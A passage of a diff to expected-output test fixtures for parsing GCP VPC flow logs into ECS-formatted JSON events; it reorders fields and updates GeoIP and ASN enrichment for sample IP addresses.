rk_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.412738626Z", + "end": "2019-06-14T03:40:08.797851544Z", + "id": "1gq7q7afe373ee", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22405,25 +23512,24 @@ "iana_number": "6", "packets": 8, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -22434,23 +23540,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392418300Z", - "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.412738626Z", - "end": "2019-06-14T03:40:08.797851544Z", - "id": "1gq7q7afe373ee", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -22459,11 +23556,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33126, 
@@ -22471,6 +23573,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415290583Z", + "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:50.809605761Z", + "end": "2019-06-14T03:44:50.919744677Z", + "id": "1gq7q7afe373ey", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22482,7 +23594,9 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22490,9 +23604,12 @@ "related": { "ip": [ "67.43.156.13", - "10.87.40.76" + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -22509,25 +23626,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 96 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392422600Z", - "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:50.809605761Z", - "end": "2019-06-14T03:44:50.919744677Z", - "id": "1gq7q7afe373ey", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -22536,13 +23638,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65318, 
@@ -22550,6 +23655,16 @@ "ip": "67.43.156.13", "packets": 747 }, + "event": { + "ingested": "2021-12-14T14:43:27.415291269Z", + "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760345858Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "1gq7q7afe373e7", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -22561,19 +23676,30 @@ "iana_number": "6", "packets": 747, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -22584,36 +23710,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 96 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392426800Z", - "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760345858Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "1gq7q7afe373e7", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53096, 
@@ -22627,6 +23737,16 @@
 "domain": "kibana",
 "ip": "10.87.40.76"
 },
+ "event": {
+ "ingested": "2021-12-14T14:43:27.415291668Z",
+ "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "kind": "event",
+ "start": "2019-06-14T03:43:20.700692281Z",
+ "end": "2019-06-14T03:43:20.813699795Z",
+ "id": "1gq7q7afe373f8",
+ "category": "network",
+ "type": "connection"
+ },
 "tags": [
 "preserve_original_event"
 ],
@@ -22638,46 +23758,6 @@
 "iana_number": "6",
 "packets": 7,
 "direction": "outbound"
- },
- "@timestamp": "2019-06-14T03:50:17.763Z",
- "ecs": {
- "version": "1.12.0"
- },
- "related": {
- "ip": [
- "10.87.40.76",
- "67.43.156.13"
- ]
- },
- "gcp": {
- "vpcflow": {
- "reporter": "SRC",
- "rtt": {
- "ms": 36
- }
- },
- "source": {
- "vpc": {
- "project_id": "my-sample-project",
- "subnetwork_name": "default",
- "vpc_name": "default"
- },
- "instance": {
- "region": "us-east1",
- "project_id": "my-sample-project",
- "zone": "us-east1-b"
- }
- }
- },
- "event": {
- "ingested": "2021-12-09T13:37:46.392430200Z",
- "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
- "kind": "event",
- "start": "2019-06-14T03:43:20.700692281Z",
- "end": "2019-06-14T03:43:20.813699795Z",
- "id": "1gq7q7afe373f8",
- "category": "network",
- "type": "connection"
 }
 },
 {
@@ -22692,11 +23772,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 9200,
@@ -22768,7 +23853,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392434600Z",
+ "ingested": "2021-12-14T14:43:27.415292058Z",
 "original": "{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:08.466779642Z",
@@ -22779,41 +23864,6 @@
 }
 },
 {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
- "destination": {
- "geo": {
- "continent_name": "America",
- "country_name": "usa"
- },
- "as": {
- "number": 15169
- },
- "address": "67.43.156.13",
- "port": 33126,
- "ip": "67.43.156.13"
- },
- "source": {
- "address": "10.87.40.76",
- "port": 5601,
- "bytes": 1776,
- "packets": 7,
- "domain": "kibana",
- "ip": "10.87.40.76"
- },
- "tags": [
- "preserve_original_event"
- ],
- "network": {
- "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=",
- "bytes": 1776,
- "transport": "tcp",
- "type": "ipv4",
- "iana_number": "6",
- "packets": 7,
- "direction": "outbound"
- },
 "@timestamp": "2019-06-14T03:50:17.763Z",
 "ecs": {
 "version": "1.12.0"
@@ -22824,6 +23874,9 @@
 "67.43.156.13"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "vpcflow": {
 "reporter": "SRC",
@@ -22844,8 +23897,33 @@
 }
 }
 },
+ "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
+ "address": "67.43.156.13",
+ "port": 33126,
+ "ip": "67.43.156.13"
+ },
+ "source": {
+ "address": "10.87.40.76",
+ "port": 5601,
+ "bytes": 1776,
+ "packets": 7,
+ "domain": "kibana",
+ "ip": "10.87.40.76"
+ },
 "event": {
- "ingested": "2021-12-09T13:37:46.392440100Z",
+ "ingested": "2021-12-14T14:43:27.415292483Z",
 "original": "{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:44:50.809605761Z",
@@ -22853,44 +23931,21 @@
 "id": "1gq7q7afe373f5",
 "category": "network",
 "type": "connection"
- }
- },
- {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
- "destination": {
- "address": "10.87.40.76",
- "port": 5601,
- "domain": "kibana",
- "ip": "10.87.40.76"
- },
- "source": {
- "geo": {
- "continent_name": "America",
- "country_name": "usa"
- },
- "as": {
- "number": 15169
- },
- "address": "67.43.156.14",
- "port": 56478,
- "bytes": 1458,
- "ip": "67.43.156.14",
- "packets": 7
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=",
- "bytes": 1458,
+ "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=",
+ "bytes": 1776,
 "transport": "tcp",
 "type": "ipv4",
 "iana_number": "6",
 "packets": 7,
- "direction": "inbound"
- },
+ "direction": "outbound"
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:17.763Z",
 "ecs": {
 "version": "1.12.0"
@@ -22901,6 +23956,9 @@
 "10.87.40.76"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "destination": {
 "vpc": {
@@ -22921,8 +23979,33 @@
 }
 }
 },
+ "destination": {
+ "address": "10.87.40.76",
+ "port": 5601,
+ "domain": "kibana",
+ "ip": "10.87.40.76"
+ },
+ "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
+ "address": "67.43.156.14",
+ "port": 56478,
+ "bytes": 1458,
+ "ip": "67.43.156.14",
+ "packets": 7
+ },
 "event": {
- "ingested": "2021-12-09T13:37:46.392445700Z",
+ "ingested": "2021-12-14T14:43:27.415292871Z",
 "original": "{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:47:20.450631492Z",
@@ -22930,6 +24013,18 @@
 "id": "1gq7q7afe373f6",
 "category": "network",
 "type": "connection"
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "network": {
+ "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=",
+ "bytes": 1458,
+ "transport": "tcp",
+ "type": "ipv4",
+ "iana_number": "6",
+ "packets": 7,
+ "direction": "inbound"
 }
 },
 {
@@ -22938,11 +24033,16 @@
 },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 52430,
@@ -23020,7 +24120,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.392451200Z",
+ "ingested": "2021-12-14T14:43:27.415293260Z",
 "original": "{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:07.968717244Z",
@@ -23031,44 +24131,9 @@
 }
 },
 {
- "log": {
- "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
- },
- "destination": {
- "geo": {
- "continent_name": "America",
- "country_name": "usa"
- },
- "as": {
- "number": 15169
- },
- "address": "67.43.156.13",
- "port": 34536,
- "ip": "67.43.156.13"
- },
- "source": {
- "address": "10.87.40.76",
- "port": 5601,
- "bytes": 1780,
- "packets": 7,
- "domain": "kibana",
- "ip": "10.87.40.76"
- },
- "tags": [
- "preserve_original_event"
- ],
- "network": {
- "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=",
- "bytes": 1780,
- "transport": "tcp",
- "type": "ipv4",
- "iana_number": "6",
- "packets": 7,
- "direction": "outbound"
- },
- "@timestamp": "2019-06-14T03:50:17.763Z",
- "ecs": {
- "version": "1.12.0"
+ "@timestamp": "2019-06-14T03:50:17.763Z",
+ "ecs": {
+ "version": "1.12.0"
 },
 "related": {
 "ip": [
@@ -23076,6 +24141,9 @@
 "67.43.156.13"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "vpcflow": {
 "reporter": "SRC",
@@ -23096,8 +24164,33 @@
 }
 }
 },
+ "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
+ "address": "67.43.156.13",
+ "port": 34536,
+ "ip": "67.43.156.13"
+ },
+ "source": {
+ "address": "10.87.40.76",
+ "port": 5601,
+ "bytes": 1780,
+ "packets": 7,
+ "domain": "kibana",
+ "ip": "10.87.40.76"
+ },
 "event": {
- "ingested": "2021-12-09T13:37:46.392456800Z",
+ "ingested": "2021-12-14T14:43:27.415293677Z",
 "original": "{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:47:51.050074134Z",
@@ -23105,6 +24198,18 @@
 "id": "1gq7q7afe373ek",
 "category": "network",
 "type": "connection"
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "network": {
+ "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=",
+ "bytes": 1780,
+ "transport": "tcp",
+ "type": "ipv4",
+ "iana_number": "6",
+ "packets": 7,
+ "direction": "outbound"
 }
 },
 {
@@ -23119,11 +24224,16 @@
 },
 "source": {
 "geo": {
- "continent_name": "America",
